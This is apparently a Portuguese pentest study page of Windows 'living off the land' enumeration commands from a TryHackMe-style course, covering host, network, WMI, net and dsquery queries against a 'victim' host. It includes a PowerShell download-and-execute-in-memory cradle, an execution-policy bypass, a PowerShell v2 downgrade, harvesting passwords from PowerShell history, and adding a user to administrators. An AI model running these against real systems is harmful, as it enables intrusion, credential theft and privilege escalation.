LinkedinTryHackme

Living Off the Land

Comandos básicos de enumeração

Comando

Resultado

hostname

Imprime o nome do PC

[System.Environment]::OSVersion.Version

Imprime a versão do sistema operacional e o nível de revisão

wmic qfe get Caption,Description,HotFixID,InstalledOn

Imprime os patches e hotfixes aplicados ao host

ipconfig /all

Imprime o estado e as configurações do adaptador de rede

set

Exibe uma lista de variáveis ​​de ambiente para a sessão atual (executada a partir do prompt CMD)

echo %USERDOMAIN%

Exibe o nome de domínio ao qual o host pertence (executado a partir do prompt CMD)

echo %logonserver%

Imprime o nome do controlador de domínio com o qual o host faz check-in (executado a partir do prompt CMD)

Informações do sistema

systeminfo

Aproveitando o PowerShell

  • Lista os módulos disponíveis carregados para uso

Get-Module	
Get-ExecutionPolicy -List

  • Isso mudará a política para nosso processo atual usando o -Scopeparâmetro. Fazer isso reverterá a política assim que desocuparmos o processo ou o encerrarmos. Isso é ideal porque não faremos uma alteração permanente no host da vítima.

Set-ExecutionPolicy Bypass -Scope Process

  • Com essa string, podemos obter o histórico do PowerShell do usuário especificado. Isso pode ser bem útil, pois o histórico de comandos pode conter senhas ou nos apontar para arquivos de configuração ou scripts que contêm senhas.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

  • Retorna valores de ambiente, como caminhos de chave, usuários, informações do computador, etc.

Get-ChildItem Env: | ft Key,Value

  • Esta é uma maneira rápida e fácil de baixar um arquivo da web usando o PowerShell e chamá-lo de memória.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

Verificações rápidas usando o PowerShell

Get-Module
Get-ExecutionPolicy -List
whoami
Get-ChildItem Env: | ft key,value

Downgrade Powershell

Get-host
powershell.exe -version 2
get-module

Verificações de firewall

netsh advfirewall show allprofiles

  • Verificação do Windows Defender (de CMD.exe)

sc query windefend

  • Obter-MpComputerStatus

Get-MpComputerStatus

Am I Alone?

  • Using qwinsta

qwinsta

Informações de rede

Comandos de rede

Descrição

arp -a

Lista todos os hosts conhecidos armazenados na tabela arp.

ipconfig /all

Imprime as configurações do adaptador para o host. Podemos descobrir o segmento de rede daqui.

route print

Exibe a tabela de roteamento (IPv4 e IPv6) identificando redes conhecidas e rotas da camada três compartilhadas com o host.

netsh advfirewall show state

Exibe o status do firewall do host. Podemos determinar se ele está ativo e filtrando tráfego.

Verificações rápidas do WMI

Comando

Descrição

wmic qfe get Caption,Description,HotFixID,InstalledOn

Imprime o nível do patch e a descrição dos Hotfixes aplicados

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

Exibe informações básicas do host para incluir quaisquer atributos na lista

wmic process list /format:list

Uma lista de todos os processos no host

wmic ntdomain list /format:list

Exibe informações sobre o domínio e os controladores de domínio

wmic useraccount list /format:list

Exibe informações sobre todas as contas locais e quaisquer contas de domínio que tenham efetuado login no dispositivo

wmic group list /format:list

Informações sobre todos os grupos locais

wmic sysaccount list /format:list

Despeja informações sobre quaisquer contas do sistema que estejam sendo usadas como contas de serviço.

Tabela de comandos de rede úteis

Comando

Descrição

net accounts

Informações sobre requisitos de senha

net accounts /domain

Política de senha e bloqueio

net group /domain

Informações sobre grupos de domínio

net group "Domain Admins" /domain

Listar usuários com privilégios de administrador de domínio

net group "domain computers" /domain

Lista de PCs conectados ao domínio

net group "Domain Controllers" /domain

Listar contas de PC de controladores de domínio

net group <domain_group_name> /domain

Usuário que pertence ao grupo

net groups /domain

Lista de grupos de domínio

net localgroup

Todos os grupos disponíveis

net localgroup administrators /domain

Listar usuários que pertencem ao grupo de administradores dentro do domínio (o grupo Domain Adminsé incluído aqui por padrão)

net localgroup Administrators

Informações sobre um grupo (administradores)

net localgroup administrators [username] /add

Adicionar usuário aos administradores

net share

Verifique as ações atuais

net user <ACCOUNT_NAME> /domain

Obter informações sobre um usuário dentro do domínio

net user /domain

Listar todos os usuários do domínio

net user %username%

Informações sobre o usuário atual

net use x: \computer\share

Monte o compartilhamento localmente

net view

Obter uma lista de computadores

net view /all /domain[:domainname]

Ações nos domínios

net view \computer /ALL

Listar compartilhamentos de um computador

net view /domain

Lista de PCs do domínio

DLL Dsquery

  • Pesquisa de usuário

dsquery user

  • Pesquisa de computador

dsquery computer

  • Pesquisa curinga

dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

  • Usuários com atributos específicos definidos (PASSWD_NOTREQD)

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

  • Procurando por controladores de domínio

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
PreviousPowerViewNextKerberoasting - from Linux

Last updated